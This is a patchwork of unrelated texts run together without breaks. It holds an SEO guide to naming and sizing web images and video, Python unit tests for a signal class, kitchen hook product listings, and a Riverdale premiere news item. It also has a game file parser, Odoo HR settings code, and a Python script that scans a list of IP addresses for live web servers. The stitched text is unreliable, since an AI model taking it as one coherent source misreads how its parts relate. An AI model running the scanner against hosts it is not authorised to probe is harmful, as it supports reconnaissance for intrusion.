Most digital images come out of the camera with some kind of ordered label, probably something like DSC0001 and have progressively higher numbers, like DSC0002, DSC0003 etc. Unfortunately, these are meaningless for SEO and this is partly why naming the file appropriately is necessary.
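If you have a large folder of camera-named files, a small script can apply human-readable names in bulk. Here is a minimal Python sketch of the idea; the folder name and the description mapping are illustrative assumptions, not a prescribed workflow:

import os
import re

def seo_filename(description, ext=".jpg"):
    # Lower-case the description and collapse anything that is not a letter
    # or digit into single hyphens, e.g.
    # "green t-shirt with Nike logo" -> "green-t-shirt-with-nike-logo.jpg"
    slug = re.sub(r"[^a-z0-9]+", "-", description.lower()).strip("-")
    return slug + ext

# Camera names mapped to content descriptions (illustrative values)
descriptions = {
    "DSC0001.jpg": "green t-shirt with Nike logo",
    "DSC0002.jpg": "man holding custom safety sign",
}

for old_name, text in descriptions.items():
    os.rename(os.path.join("photos", old_name),
              os.path.join("photos", seo_filename(text)))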
Think about where you plan to use the images before you upload.
If they only have to be small and cover less than ½ the width of a typical website, then it’s unlikely they need to have dimensions larger than 600px by 600px. The typical modern website has a width of about 1000px to 1400px, unless set to full screen.
The display size, and especially the capability to display well on variable screen sizes from small to very large, is a factor in Google ranking. Screens and resolutions have gotten larger, so websites have too.
Pre-size your images according to the maximum size you need to display them at. Not doing so might mean storing many megabytes (or even gigabytes) more of data in your site, and also making your images load very slowly when displaying on your site.
The latter may affect your SEO because it means Google will also have to wait to download what your page looks like. This may count against you when assessing ranking for your site.
Google monitors download speeds of websites and also checks image size and bandwidth use, which you can get a report on using the Google PageSpeed Insights tool.
Aside from sizing, also consider aspect ratio. Images that have content that looks best in landscape format will not look good at all if you want to place them in a portrait sized space in your website. Check that the shape of your image matches the shape of the space you need to fit it into.
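As a rough sketch of pre-sizing in practice, the Pillow library can cap an image at a maximum display size while preserving its aspect ratio; the 600px limit and file names below are illustrative:

from PIL import Image

def presize(path, out_path, max_px=600):
    img = Image.open(path)
    # thumbnail() shrinks in place, keeps the aspect ratio,
    # and never enlarges an image that is already small enough
    img.thumbnail((max_px, max_px))
    img.save(out_path)

presize("photos/green-t-shirt-with-nike-logo.jpg",
        "photos/green-t-shirt-with-nike-logo-600x600.jpg")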
There are two main ways you can upload images into your website.
The first and probably least technically challenging way is to use the CMS (if your website has one) to upload images into a media folder of some sort. For WordPress websites, like this one, you can choose to upload images into a dated folder, or add them into a single generic folder.
Dated folders are usually divided by year, then month, for example 2015/1/ and then 2015/2/ etc., based on the month in which you uploaded it.
Generic folders might be called ‘media’ or ‘images’ and all your images and or media might upload to there.
For the latter, you can’t have two images or any other files of the same name in the same folder, which means each image size might need a size code appended to the image name, like ‘green-t-shirt-200×300.jpg’. This image would measure 200px by 300px. The size code may reduce a little of the SEO strength of a well-named image, but shouldn’t be too much of an issue, so don’t worry about it.
If you’ve used your CMS to upload images, something you should be aware of: The WordPress CMS (and this may be true for many different CMS types) might modify the name of your file. Especially if your file name contains characters that are not permitted by HTML conventions.
For example, the character ‘&’ is usually removed and replaced by ‘-’. So are spaces. But only one dash is allowed at a time. So a file called ‘Green & Red T-shirt.jpg’ will become ‘green-red-t-shirt.jpg’.
The WordPress CMS will also re-sample your images and create new copies of each image at 2 or 3 different sizes, including the original size. The exact sizes depend on your CMS settings.
The second way is to use FTP software on your computer.
Using FTP will allow you to upload images and videos that bypass the HTML naming convention changes noted above. It also allows you to create any new folders in your website to store your images just about anywhere.
Once you’ve named your images, you can add title and ALT tags, but these are often easier to add once you’ve imported or uploaded the images into your website. This is where SEO comes into play.
If you named your images as suggested above, then tagging them with ALT and Title tags will be a lot simpler, because all you need to do is copy the name of the file. If you don’t have time to tag all of your images, you at least have the file names optimised.
This is why naming files with their content is important, because in doing so, you usually use keywords that are relevant to your site. If not, then you should take the time to tag the images – you should do this anyway – but you can ‘get away’ with not doing it if you have hundreds of images and they are well named.
The ALT tag and Title tag can be different, and they are used for different purposes in the browser.
The Title tag is the tag that provides additional information to the content of the image when displayed in the browser. It may appear when the user hovers their mouse over the image.
The ALT tag is the information that appears in the browser in the place of the image when the image has not been loaded for some reason. There are many reasons why an image does not load, but the point here is that by setting an ALT you can still provide meaningful content to the user in its place.
Both the ALT tag and Title tags should contain a keyword relevant to the page in which they appear. If you need to use the same image elsewhere on a page with different keyword focus, then upload the image again so you can set a second ALT and Title for the new image placement.
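In the rendered page, both end up as attributes on the image markup, along the lines of <img src="green-t-shirt.jpg" alt="green t-shirt" title="Green cotton t-shirt"> (the file name and wording here are only illustrative).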
Avoid overcrowding any tags with multiple keywords for the same reason that stuffing a page full of various keywords is not a good plan for SEO.
Browsers such as Internet Explorer, Firefox, Chrome and Safari all support the same image types served across the internet.
Your choice of image type should be made before uploading your images to the website, as most CMSs are unable to convert an image from one type to another.
JPG images are best when you need to display photos. Especially when the photo has shading, lots of colour, lots of texture etc. JPG also supports variable compression – see below.
GIF images are best when your image has limited colours, like in logos. Often a logo will have just two or three colours. My logo for this site has just one colour. These image types only support limited colour variance, so check that your colour selections are appropriate before choosing to use GIF. This format can also support transparent pixels (transparent parts of the image where no colour is needed or where the background is supposed to show through – common for logos).
PNG images support a full colour range and also transparency. They offer some compression capability, but generally result in the largest files of the three possible formats. If no transparency is required, then JPG is the better choice.
Whenever possible, aim to use the image type and compression setting that allows you to display your images well but only just within the point where compression starts to make them lose quality. This is called ‘visual optimisation’. This is also the point where your image file will be the smallest possible without affecting your UX. Every image should be visually optimised.
This is also the point where your images will load into the user’s browser as quickly as possible without the compromise on quality. If you’re not sure if your images are optimised for best load speed, try the Page Speed Insights test provided by Google.
You will also see a site-wide effect in Google Search Console on page-load speeds (in the section about Crawl) if you have un-optimised images. Your site’s average download time in GSC should be around 2000ms or less.
The Page Speed Insights test will show you if your images need optimising. It’s probable that the data from GSC on Crawl download speeds will affect the SEO of your website, because the preference for Google is to provide their users with links to sites that have the best UX.
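If you prepare images in bulk before uploading, a small script can handle the resizing and compression for you. A minimal sketch, assuming the Pillow imaging library is installed and using illustrative file names and sizes:

from PIL import Image

img = Image.open('green-t-shirt.jpg')
img.thumbnail((800, 800))  # cap the longest side at the size the page actually displays
img.save('green-t-shirt-800x800.jpg', 'JPEG',
         quality=82,  # lower this until artefacts appear, then back off a step
         optimize=True, progressive=True)

Run over a folder of images, something like this gets each file close to its visually optimised size before it ever reaches the CMS.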
As with images, the shape and size of video should be limited to the shape and size it will display in your site.
If you plan to use YouTube or Vimeo to host your videos, you don’t have quite the same constraints as with images, but you should still consider how much data you really need to provide. If the video resolution is too high, the user’s browser may struggle to buffer it, causing the video to ‘jitter’ as it plays.
Videos are also tagged in the same manner as images although the terminology and parameters are a little different. Videos will allow the use of a title element – which is the title of the video.
If using YouTube, you have a 100 character limit and should write the title to include the main keywords relevant to both the video and the location in which you are going to place it (if adding it into a website).
Video descriptions are quite expansive and allow up to 5000 characters. This should contain a full description of the content of your video and should use keywords. They’re a top spot for adding SEO value into your video.
Tags can also be used and are essentially a range of keywords for which your video might be an appropriate piece of content should someone search for any keyword from the list.
Videos via YouTube also support the addition of transcripts, annotations and captions, each of which add to SEO value.
There is some tendency for Google to ‘prefer’ short videos of under one minute. Your goal might be to produce a video in the 30-90 second range for best SEO; however, length is only one factor alongside those noted above, and it may be offset by other well-optimised features should your video run longer than a couple of minutes.
If you plan to host your own videos, ensure you are able to serve whichever format is required by the browser. Not all operating systems and browsers support a single universal format, so you will need to prepare your video in three commonly used formats and have them sampled appropriately for fast streaming.
#
# Martin Kolman <mkolman@redhat.com>
#
# Copyright 2016 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use, modify,
# copy, or redistribute it subject to the terms and conditions of the GNU
# General Public License v.2. This program is distributed in the hope that it
# will be useful, but WITHOUT ANY WARRANTY expressed or implied, including the
# implied warranties of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Any Red Hat
# trademarks that are incorporated in the source code or documentation are not
# subject to the GNU General Public License and may only be used or replicated
# with the express permission of Red Hat, Inc.
#
# Test the Python-based signal and slot implementation.
#
import unittest
from pyanaconda.core.signal import Signal
class FooClass(object):
def __init__(self):
self._var = None
@property
def var(self):
return self._var
def set_var(self, value):
self._var = value
class SignalTestCase(unittest.TestCase):
def setUp(self):
self.var = None
def method_test(self):
"""Test if a method can be correctly connected to a signal."""
signal = Signal()
foo = FooClass()
self.assertIsNone(foo.var)
# connect the signal
signal.connect(foo.set_var)
# trigger the signal
signal.emit("bar")
# check if the callback triggered correctly
self.assertEqual(foo.var, "bar")
# try to trigger the signal again
signal.emit("baz")
self.assertEqual(foo.var, "baz")
# now try to disconnect the signal
signal.disconnect(foo.set_var)
# check that calling the signal again
# no longer triggers the callback
signal.emit("anaconda")
self.assertEqual(foo.var, "baz")
def function_test(self):
"""Test if a local function can be correctly connected to a signal."""
# create a local function
def set_var(value):
self.var = value
signal = Signal()
self.assertIsNone(self.var)
# connect the signal
signal.connect(set_var)
# trigger the signal
signal.emit("bar")
# check if the callback triggered correctly
self.assertEqual(self.var, "bar")
# try to trigger the signal again
signal.emit("baz")
self.assertEqual(self.var, "baz")
# now try to disconnect the signal
signal.disconnect(set_var)
# check that calling the signal again
# no longer triggers the callback
signal.emit("anaconda")
self.assertEqual(self.var, "baz")
def lambda_test(self):
"""Test if a lambda can be correctly connected to a signal."""
foo = FooClass()
signal = Signal()
self.assertIsNone(foo.var)
# connect the signal
# pylint: disable=unnecessary-lambda
lambda_instance = lambda x: foo.set_var(x)
signal.connect(lambda_instance)
# trigger the signal
signal.emit("bar")
# check if the callback triggered correctly
self.assertEqual(foo.var, "bar")
# try to trigger the signal again
signal.emit("baz")
self.assertEqual(foo.var, "baz")
# now try to disconnect the signal
signal.disconnect(lambda_instance)
# check that calling the signal again
# no longer triggers the callback
signal.emit("anaconda")
self.assertEqual(foo.var, "baz")
def clear_test(self):
"""Test if the clear() method correctly clears any connected callbacks."""
def set_var(value):
self.var = value
signal = Signal()
foo = FooClass()
lambda_foo = FooClass()
self.assertIsNone(foo.var)
self.assertIsNone(lambda_foo.var)
self.assertIsNone(self.var)
# connect the callbacks
signal.connect(set_var)
signal.connect(foo.set_var)
# pylint: disable=unnecessary-lambda
signal.connect(lambda x: lambda_foo.set_var(x))
# trigger the signal
signal.emit("bar")
# check that the callbacks were triggered
self.assertEqual(self.var, "bar")
self.assertEqual(foo.var, "bar")
self.assertEqual(lambda_foo.var, "bar")
# clear the callbacks
signal.clear()
# trigger the signal again
signal.emit("anaconda")
# check that the callbacks were not triggered
self.assertEqual(self.var, "bar")
self.assertEqual(foo.var, "bar")
self.assertEqual(lambda_foo.var, "bar")
def signal_chain_test(self):
"""Check if signals can be chained together."""
foo = FooClass()
self.assertIsNone(foo.var)
signal1 = Signal()
signal1.connect(foo.set_var)
signal2 = Signal()
signal2.connect(signal1.emit)
signal3 = Signal()
signal3.connect(signal2.emit)
# trigger the chain
signal3.emit("bar")
# check if the initial callback was triggered
self.assertEqual(foo.var, "bar")
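# For reference, a minimal Signal implementation consistent with the tests above
# might look like the following sketch (illustrative only; this is not the
# actual pyanaconda.core.signal code):
class _SketchSignal(object):
    def __init__(self):
        self._callbacks = []

    def connect(self, callback):
        self._callbacks.append(callback)

    def disconnect(self, callback):
        self._callbacks.remove(callback)

    def clear(self):
        del self._callbacks[:]

    def emit(self, *args, **kwargs):
        # iterate over a copy so a callback may disconnect itself mid-emit
        for callback in list(self._callbacks):
            callback(*args, **kwargs)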
Keep knives and other frequently used tools and utensils conveniently within reach with this wall-mounted Magnetic Knife Holder. They can hold sharp knives, tools and utensils securely. And it also won't dull knives.
The Egg Skelter can hold up to 24 eggs (capacity varies based on the size of your eggs) and makes a perfect addition to any kitchen. Colour is silver. The egg trough is 1.90" wide.
With these simple and functional stainless steel S hooks (12 flat S hooks), you can hang washcloths, loofahs, body brushes, toiletries, towels and robes in the bathroom. They also work great for hanging kitchen tools such as pans, pots, spatulas, coffee mugs, hand towels, potholders and spoons.
The S shape is suitable for hanging on existing objects without the need for screws and nails.
10 Hook Under-the-Shelf Mug Rack, Metal Cup Storage Holder & Drying Rack, Silver. Description: - Metal under-the-shelf coffee mug/tea cup rack with 10 hooks. - Installs easily without tools: slide rack over any shelf less than 1 inch thick and at least 12 inches deep. - Can also be used under desks, tables, shelves, and workbenches to hold keys, small tools, cords, or utensils. - Approximate Dimensions (in inches): 3 H × 7.3 W × 11 L; Distance Between Hooks - 2.5 inches.
Combines with other accessories in the GRUNDTAL series. Key features: can be used in high-humidity areas. Wipe clean with a soft cloth dampened with water and a mild dish detergent or soap, if necessary; wipe dry with a clean cloth.
This 6-Pc. Wall Mounted Coffee Mug Rack is an easy and convenient way to keep your kitchen clutter free. A fourth bar is used to hang the 2 included baskets which are ideal for storing your coffee and tea accessories.
Hanging Pot Holder Pan Hanger Cookware Hook Rack Iron Kitchen Storage Organizer. Product Material: Stainless steel.
Start organizing your kitchen like a professional chef! No room for under-cabinet or drawer storage? Number one on the market, these hooks combine well with all hanging kitchen tools and accessories and are compatible with most cookware racks.
Uses: the back-of-door design can be hung on a cabinet. The hooks can also hold rags, brushes and more. Product weight: about 50g.
5PCS Stainless Steel S-Shape Hooks Kitchen Hanger Rack Clothes Hanging Holders. 5 x S hooks (stainless steel). Great for hanging plants outdoors, in hot houses and when camping. Material: stainless steel. Strong enough to hang many things.
L-size stainless steel hooks, 3 pcs. Material: stainless steel. Maximum load about 20kg.
Product description: ideal for storing sponges. Made of stainless steel, durable to use. Specification: material: stainless steel; size: 5x5x3.4 cm (1.97x1.97x1.34 inch); weight: 60g; colour: as shown. Package includes: 1 storage rack. Brand: Homenhome. MPN: does not apply. Condition: 100% brand new. Country/region of manufacture: China. UPC: 682365636485.
Ikea Grundtal 5 pc S Hook Hangers - 2.75"
IKEA 5X Grundtal Hooks. You only get one package, not 4; I have 4 packages available! Every effort is made for accuracy.
Each S hook has a sharp pointed end on either side. Long size: 15cm. We will try our best to reduce the risk of customs duties.
This kitchen counter microwave oven rack is essential for your daily life. It greatly enhances space saving, keeping your kitchen tidy and clean. Multi-functional, sturdy and durable. Eight hooks on the sides of the shelf are perfect for hanging spoons, spatulas and other small kitchen utensils.
Kitchen Storage Rack Cupboard Hanging Hook Hanger Stainless Steel Organizer. Use them inside a cupboard to hang kitchen utensils, hang a towel in a bathroom or hang a necklace in a closet. Features: 5 Hooks, Drill Free, Space-saving.
Both can be cut to any size, using a hacksaw or pipecutter. Mirror polished finish.
The soap rack's mesh design lets water drain and air circulate. It is stainless steel, sturdy and durable, and can be removed and reused. Includes 1 soap rack with hooks.
Lot of 3 IKEA Grundtal round white caddies with stainless steel hanger rail system, 401.167.44, new. Condition is new. Shipped with USPS Priority Mail.
3. Multipurpose: this wall hanger can hold spoons, towels, gloves, knives and forks, pans, pots, keys, or basically anything else you want hung up in your kitchen, bathroom or other places. There are 2 installation options.
IKEA GRUNDTAL 10 hooks 2 3/4" each. Combines with other accessories in the GRUNDTAL series. Wipe clean with a soft cloth dampened with water and a mild dish detergent or soap, if necessary. - Can be used in high humidity areas.
Dishwasher safe / mirror-like finish / twinkling glossy surface / matches well with silverware. Keep your kitchenware organized and within reach with this handy, attractive, hygienic stainless steel kitchenware holder.
Hook Length: 9cm. Color: Silver.
Can be hung on the KUNGSFORS rail. May be combined with other products in the KUNGSFORS series. Stainless steel. Maximum load per hook: 9 lb (4 kg). Wipe clean using a damp cloth and a mild cleaner.
#!/usr/bin/env python
'''
Author: Christopher Duffy
Date: July 2015
Name: multi_process.py
Purpose: To identify live web applications with a list of IP addresses, using parallel processes
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import multiprocessing, urllib2, argparse, sys, logging, datetime, time
def host_request(host):
print("[*] Testing %s") % (str(host))
target = "http://" + host
target_secure = "https://" + host
timenow = time.time()
record = datetime.datetime.fromtimestamp(timenow).strftime('%Y-%m-%d %H:%M:%S')
logger = logging.getLogger(record)
try:
request = urllib2.Request(target)
request.get_method = lambda : 'HEAD'
response = urllib2.urlopen(request)
response_data = str(response.info())
logger.debug("[*] %s" % response_data)
response.close()
except:
response = None
response_data = None
    try:
        # Build a HEAD request for the HTTPS target, mirroring the HTTP logic above
        # (the original passed the URL straight to urlopen and read the wrong response)
        request_secure = urllib2.Request(target_secure)
        request_secure.get_method = lambda : 'HEAD'
        response_secure = urllib2.urlopen(request_secure)
        response_secure_data = str(response_secure.info())
        logger.debug("[*] %s" % response_secure_data)
        response_secure.close()
    except:
        response_secure = None
        response_secure_data = None
if response_data != None and response_secure_data != None:
r = "[+] Insecure webserver detected at %s reported by %s" % (target, str(multiprocessing.Process().name))
rs = "[+] Secure webserver detected at %s reported by %s" % (target_secure, str(multiprocessing.Process().name))
logger.debug("[+] Insecure web server detected at %s and reported by process %s" % (str(target), str(multiprocessing.Process().name)))
logger.debug("[+] Secure web server detected at %s and reported by process %s" % (str(target_secure), str(multiprocessing.Process().name)))
return(r, rs)
elif response_data == None and response_secure_data == None:
r = "[-] No insecure webserver at %s reported by %s" % (target, str(multiprocessing.Process().name))
rs = "[-] No secure webserver at %s reported by %s" % (target_secure, str(multiprocessing.Process().name))
logger.debug("[-] Insecure web server was not detected at %s and reported by process %s" % (str(target), str(multiprocessing.Process().name)))
logger.debug("[-] Secure web server was not detected at %s and reported by process %s" % (str(target_secure), str(multiprocessing.Process().name)))
return(r, rs)
elif response_data != None and response_secure_data == None:
r = "[+] Insecure webserver detected at %s reported by %s" % (target, str(multiprocessing.Process().name))
rs = "[-] No secure webserver at %s reported by %s" % (target_secure, str(multiprocessing.Process().name))
logger.debug("[+] Insecure web server detected at %s and reported by process %s" % (str(target), str(multiprocessing.Process().name)))
logger.debug("[-] Secure web server was not detected at %s and reported by process %s" % (str(target_secure), str(multiprocessing.Process().name)))
return(r, rs)
elif response_secure_data != None and response_data == None:
r = "[-] No insecure webserver at %s reported by %s" % (target, str(multiprocessing.Process().name))
rs = "[+] Secure webserver detected at %s reported by %s" % (target_secure, str(multiprocessing.Process().name))
logger.debug("[-] Insecure web server was not detected at %s and reported by process %s" % (str(target), str(multiprocessing.Process().name)))
logger.debug("[+] Secure web server detected at %s and reported by process %s" % (str(target_secure), str(multiprocessing.Process().name)))
return(r, rs)
else:
logger.debug("[-] No results were recorded for %s or %s" % (str(target), str(target_secure)))
def log_init(log):
level = logging.DEBUG # Logging level
format = logging.Formatter("%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s") # Log format
logger_obj = logging.getLogger() # Getter for logging agent
file_handler = logging.FileHandler(log) # File Handler
#stderr_handler = logging.StreamHandler() # STDERR Handler
targets_list = []
# Configure logger formats for STDERR and output file
file_handler.setFormatter(format)
#stderr_handler.setFormatter(format)
# Configure logger object
logger_obj.addHandler(file_handler)
#logger_obj.addHandler(stderr_handler)
logger_obj.setLevel(level)
def main():
# If script is executed at the CLI
    usage = '''usage: %(prog)s [-t hostfile] [-l logfile.log] [-m 2] -q -v -vv -vvv'''
parser = argparse.ArgumentParser(usage=usage)
parser.add_argument("-t", action="store", dest="targets", default=None, help="Filename for hosts to test")
parser.add_argument("-m", "--multi", action="store", dest="multiprocess", default=1, type=int, help="Number of proceses, defaults to 1")
parser.add_argument("-l", "--logfile", action="store", dest="log", default="results.log", type=str, help="The log file to output the results")
parser.add_argument("-v", action="count", dest="verbose", default=1, help="Verbosity level, defaults to one, this outputs each command and result")
parser.add_argument("-q", action="store_const", dest="verbose", const=0, help="Sets the results to be quiet")
parser.add_argument('--version', action='version', version='%(prog)s 0.42b')
args = parser.parse_args()
# Argument Validator
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
if (args.targets == None):
parser.print_help()
sys.exit(1)
# Set Constructors
targets = args.targets # Targets to be parsed
verbose = args.verbose # Verbosity level
    processes = args.multiprocess # Processes to be used
log = args.log # Configure the log output file
if ".log" not in log:
log = log + ".log"
# Load the targets into a list and remove trailing "\n"
with open(targets) as f:
targets_list = [line.rstrip() for line in f.readlines()]
    # Establish the process pool; initializer/initargs run log_init(log) once in
    # each worker (passing log_init(log) directly would call it immediately and
    # hand Pool a None initializer)
    pool = multiprocessing.Pool(processes=processes, initializer=log_init, initargs=(log,))
# Queue up the targets to assess
results = pool.map(host_request, targets_list)
for result in results:
for value in result:
print(value)
if __name__ == '__main__':
main()
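# A typical invocation (host file name illustrative):
#
#     python multi_process.py -t hosts.txt -m 4 -l results.log
#
# Note that the script targets Python 2, since it relies on urllib2.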
Just over two months after Riverdale was renewed for Season 3, the CW has given it an official premiere date.
After leaving fans in suspense with a shocking Season 2 finale, the buzzy teen drama will return Wednesday, October 10 at 8 p.m. Specifics surrounding the show's next chapter remain sparse, though series creator Roberto Aguirre-Sacasa has let a few details slip.
In an interview with The Hollywood Reporter, he said that Season 3, much like Riverdale's first two installments, will include a "high genre element."
"That's what the show is. It's not just about the Archie characters," he explained. "It's the Archie characters put into a specific genre, and we see how they relate and survive and adapt."
And while speaking with Deadline, he shared that it may dig into more of Riverdale's history, including why the town seems to be so plagued by crime.
"We’re going to examine different kinds of pulp and noir," he said. "So if it feels like Riverdale is a place where people are getting killed all the time, maybe we find out that that’s not a coincidence. Maybe in Season 3, that’s actually part of a bigger pattern and a bigger unspoken history."
Elsewhere, he teased the arrival of Jughead's mom and sister, Gladys and Jellybean Jones, and concluded that, for as much as Riverdale ramps up its twists, it will always stay centered around the relationships that have long driven the Archie franchise.
"We are going to have the gonzo, crazy, heightened story and plot twists and turns that people appreciate about Riverdale, sure," he continued. "But I’ll tell you we’re also really going to keep our eye on the prize, which is the friendships and the romances."
Mark your calendars, Riverdale fans! October is coming sooner than you think.
import typing
from .protos import Entrypoint
from .sprite import Sprite
from .palette import Palette
from .pilot import Pilot
class TournamentFile(Entrypoint):
MAX_ENEMIES = 256
MAX_LOCALES = 10
__slots__ = (
"bk_name",
"winnings_multiplier",
"unknown_a",
"registration_fee",
"assumed_initial_value",
"tournament_id",
"pic_filename",
"locale_logos",
"locale_descriptions",
"locale_titles",
"locale_end_texts",
"palette",
"pilots",
)
def __init__(self):
self.bk_name: str = ""
self.winnings_multiplier: float = 0.0
self.unknown_a: int = 0
self.registration_fee: int = 0
self.assumed_initial_value: int = 0
self.tournament_id: int = 0
self.pic_filename: str = ""
self.palette: Palette = Palette()
self.locale_logos: typing.List[Sprite] = []
self.locale_descriptions: typing.List[str] = []
self.locale_titles: typing.List[str] = []
self.locale_end_texts: typing.List[typing.List[typing.List[str]]] = []
self.pilots: typing.List[Pilot] = []
def serialize(self):
return {
"bk_name": self.bk_name,
"winnings_multiplier": self.winnings_multiplier,
"unknown_a": self.unknown_a,
"registration_fee": self.registration_fee,
"assumed_initial_value": self.assumed_initial_value,
"tournament_id": self.tournament_id,
"pic_filename": self.pic_filename,
"locale_logos": [logo.serialize() for logo in self.locale_logos],
"locale_descriptions": self.locale_descriptions,
"locale_titles": self.locale_titles,
"locale_end_texts": self.locale_end_texts,
"palette": self.palette.serialize(),
"pilots": [p.serialize() for p in self.pilots],
}
def read(self, parser):
enemy_count = parser.get_uint32()
victory_text_offset = parser.get_uint32()
self.bk_name = parser.get_null_padded_str(14)
self.winnings_multiplier = parser.get_float()
self.unknown_a = parser.get_uint32()
self.registration_fee = parser.get_uint32()
self.assumed_initial_value = parser.get_uint32()
self.tournament_id = parser.get_uint32()
# Enemy block offsets
parser.set_pos(300)
offsets = [parser.get_uint32() for _ in range(enemy_count + 1)]
# Enemy data
for m in range(enemy_count):
parser.set_pos(offsets[m])
self.pilots.append(Pilot().read(parser))
# Seek to locales
parser.set_pos(offsets[enemy_count])
# Load logo sprites
self.locale_logos: typing.List[Sprite] = [
Sprite().read(parser) for _ in range(self.MAX_LOCALES)
]
# Tournament palette
self.palette = Palette().read_range(parser, 128, 40)
# Tournament PIC file name
self.pic_filename = parser.get_var_str(size_includes_zero=True)
# Locale texts
for m in range(self.MAX_LOCALES):
self.locale_titles.append(parser.get_var_str(size_includes_zero=True))
self.locale_descriptions.append(parser.get_var_str(size_includes_zero=True))
# Seek to victory texts
parser.set_pos(victory_text_offset)
        # Get all end text pages: for each of the 10 locales, 11 pilots with 10 pages each (per the loops below)
for t in range(self.MAX_LOCALES):
pilots = []
for h in range(11):
pilots.append(
[parser.get_var_str(size_includes_zero=True) for _ in range(10)]
)
self.locale_end_texts.append(pilots)
return self
Shouldn't we draw the vertical line after we draw the middle horizontal line (the horizontal line below the line closing the rectangle)?
We have checked the stroke order of 里 (the simplified character) and found no mistake. It may be that we missed something, or that you wanted to tell us something else; in either case, please let us know by describing the error or suggestion. We are eager to continuously improve every aspect of trainchinese and appreciate any suggestions.
#-+--------------------------------------------------------------------
# Igatools a general purpose Isogeometric analysis library.
# Copyright (C) 2012-2016 by the igatools authors (see authors.txt).
#
# This file is part of the igatools library.
#
# The igatools library is free software: you can use it, redistribute
# it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#-+--------------------------------------------------------------------
# QA (pauletti, Jun 6, 2014):
from init_instantiation_data import *
data = Instantiation()
(f, inst) = (data.file_output, data.inst)
classes = ['BernsteinExtraction<%d,%d,%d>' %(x.dim, x.range, x.rank)
for x in inst.all_ref_sp_dims]
classes.append('BernsteinExtraction<0,0,1>')
#---------------------------------------------------
f.write('IGA_NAMESPACE_CLOSE\n')
archives = ['OArchive','IArchive']
id = 0
for c in unique(classes):
alias = 'BernsteinExtractionAlias%d' %(id)
f.write('using %s = iga::%s; \n' % (alias, c))
for ar in archives:
f.write('CEREAL_SPECIALIZE_FOR_ARCHIVE(%s,%s,cereal::specialization::member_serialize)\n' %(ar,alias))
id += 1
f.write('IGA_NAMESPACE_OPEN\n')
#---------------------------------------------------
Below is a list of all the valid IP Addresses in the range from 84.192.X.X to 84.223.X.X. If you would like to get more detailed information about a range, click on that range. Otherwise, you can type a specific IP Address in the box to the left to do a quick search.
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from openerp.osv import fields, osv
class hr_config_settings(osv.osv_memory):
_name = 'hr.config.settings'
_inherit = 'res.config.settings'
_columns = {
'module_hr_timesheet_sheet': fields.boolean('Allow timesheets validation by managers',
help ="""This installs the module hr_timesheet_sheet."""),
'module_hr_attendance': fields.boolean('Install attendances feature',
help ="""This installs the module hr_attendance."""),
'module_hr_timesheet': fields.boolean('Manage timesheets',
help ="""This installs the module hr_timesheet."""),
'module_hr_holidays': fields.boolean('Manage holidays, leaves and allocation requests',
help ="""This installs the module hr_holidays."""),
'module_hr_expense': fields.boolean('Manage employees expenses',
help ="""This installs the module hr_expense."""),
'module_hr_recruitment': fields.boolean('Manage the recruitment process',
help ="""This installs the module hr_recruitment."""),
'module_hr_contract': fields.boolean('Record contracts per employee',
help ="""This installs the module hr_contract."""),
'module_hr_evaluation': fields.boolean('Organize employees periodic evaluation',
help ="""This installs the module hr_evaluation."""),
'module_hr_gamification': fields.boolean('Drive engagement with challenges and badges',
help ="""This installs the module hr_gamification."""),
'module_sale_contract': fields.boolean('Allow invoicing based on timesheets (the sale application will be installed)',
help ="""This installs the module sale_contract, which will install sales management too."""),
'module_hr_payroll': fields.boolean('Manage payroll',
help ="""This installs the module hr_payroll."""),
'module_website_hr_recruitment': fields.boolean('Publish jobs on your website',
help ="""This installs the module website_hr_recruitment"""),
'group_hr_attendance': fields.boolean('Track attendances for all employees',
implied_group='base.group_hr_attendance',
help="Allocates attendance group to all users."),
}
def onchange_hr_timesheet(self, cr, uid, ids, timesheet, context=None):
""" module_hr_timesheet implies module_hr_attendance """
if timesheet:
return {'value': {'module_hr_attendance': True}}
return {}
def onchange_hr_attendance(self, cr, uid, ids, attendance, context=None):
""" module_hr_timesheet implies module_hr_attendance """
if not attendance:
return {'value': {'module_hr_timesheet': False,'group_hr_attendance': False}}
return {}
def onchange_group_hr_attendance(self, cr, uid, ids, hr_attendance, context=None):
if hr_attendance:
return {'value': {'module_hr_attendance': True}}
return {}
